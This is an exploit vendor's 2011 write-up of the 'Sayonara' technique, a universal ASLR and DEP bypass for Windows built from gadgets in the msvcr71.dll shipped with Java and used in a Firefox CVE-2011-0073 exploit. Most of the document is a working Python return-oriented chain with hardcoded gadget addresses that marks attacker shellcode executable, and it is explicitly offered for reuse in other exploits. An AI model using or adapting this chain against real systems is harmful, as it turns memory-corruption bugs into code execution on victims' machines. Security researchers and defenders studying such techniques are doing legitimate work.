#+-------- --- -
#| White Phosphorus Exploit Pack Sayonara ASLR DEP Bypass Technique
#|  June 2011
#+--

Successful exploitation of modern Windows relies on the attackers
ability to bypass various memory protection mechanisms, ASLR and DEP
being the combination that creates the most formidable opponent. White
Phosphorus provides customers with reliable, universal exploits that
bypass ASLR and DEP where ever possible. We dedicate time and effort 
to researching techniques that allow us to do this.

In May 2011 we released version 1.12 of the pack including a module that
exploited the Mozilla Firefox nsTreeRange Dangling Pointer vulnerability
(CVE-2011-0073) on Firefox 3.6.0-3.6.16 on all versions of windows, and
made use of a ASLR DEP bypass that is internally called "Sayonara".

Sayonara is a position and target independent universal return orientated
payload that allows us to bypass ASLR and DEP on any version of Windows.
 
The DLL used by the technique is a redistribution of the shared C runtime 
component of Microsoft Visual C++ - msvcr71.dll - shipped with countless
applications. In the case of browser based exploitation msvcr71.dll ships
with the Java Runtime Environment. 

While it's common knowledge that there are non ASLR DLLs in Java, the 
problem with native Java DLLs is that they are often recompiled with new 
Java releases. This means the location of known instruction sequences for 
a bypass in one version of the JRE may be broken in the next. Msvcr71.dll
is useful because it has remained static since 2006 when it was first 
introduced in version 1.6.0.0.

This provides one DLL and one payload to bypass ASLR and DEP on all
versions of Windows when msvcr71.dll is loaded or can be forced to be
loaded as is the case with browsers and Java.

The following code or derivatives of it can freely be used, modified and
otherwise improved to make use of this technique in your exploits.

#+-------- --- -
#| White Phosphorus Exploit Pack Sayonara ASLR DEP Bypass Technique
#|   Code
#+--

from struct import pack

def wp_sayonaraASLRDEPBypass(size=1000):
    # White Phosphorus
    # Sayonara Universal ASLR + DEP bypass for Windows [2003/XP/Vista/7]
    #
    # This technique uses msvcr71.dll which has shipped unchanged
    # in the Java Runtime Environment since v1.6.0.0 released
    # December 2006.
    #
    # web:   http://www.whitephosphorus org
    # mail:  support@whitephosphorus org
    # sales: http://www.immunityinc.com/products-whitephosphorus.shtml

    print "WP> Building Sayonara - Universal ASLR and DEP bypass"

    size += 4  # bytes to shellcode after pushad esp ptr

    depBypass = pack('<L', 0x7C344CC1)  # pop eax;ret;
    depBypass += pack('<L', 0x7C3410C2) # pop ecx;pop ecx;ret;
    depBypass += pack('<L', 0x7C342462) # xor chain; call eax {0x7C3410C2}
    depBypass += pack('<L', 0x7C38C510) # writeable location for lpflOldProtect
    depBypass += pack('<L', 0x7C365645) # pop esi;ret;
    depBypass += pack('<L', 0x7C345243) # ret;
    depBypass += pack('<L', 0x7C348F46) # pop ebp;ret;
    depBypass += pack('<L', 0x7C3487EC) # call eax 
    depBypass += pack('<L', 0x7C344CC1) # pop eax;ret; 
    depBypass += pack("<i", -size)      # {size}
    depBypass += pack('<L', 0x7C34D749) # neg eax;ret; {adjust size}
    depBypass += pack('<L', 0x7C3458AA) # add ebx, eax;ret; {size into ebx}
    depBypass += pack('<L', 0x7C3439FA) # pop edx;ret; 
    depBypass += pack('<L', 0xFFFFFFC0) # {flag}
    depBypass += pack('<L', 0x7C351EB1) # neg edx;ret; {adjust flag}
    depBypass += pack('<L', 0x7C354648) # pop edi;ret;
    depBypass += pack('<L', 0x7C3530EA) # mov eax,[eax];ret;
    depBypass += pack('<L', 0x7C344CC1) # pop eax;ret;
    depBypass += pack('<L', 0x7C37A181) # (VP RVA + 30) - {0xEF adjustment}
    depBypass += pack('<L', 0x7C355AEB) # sub eax,30;ret;
    depBypass += pack('<L', 0x7C378C81) # pushad; add al,0xef; ret;
    depBypass += pack('<L', 0x7C36683F) # push esp;ret;

    print "WP> Universal Bypass Size: %d bytes"%len(depBypass)
    return depBypass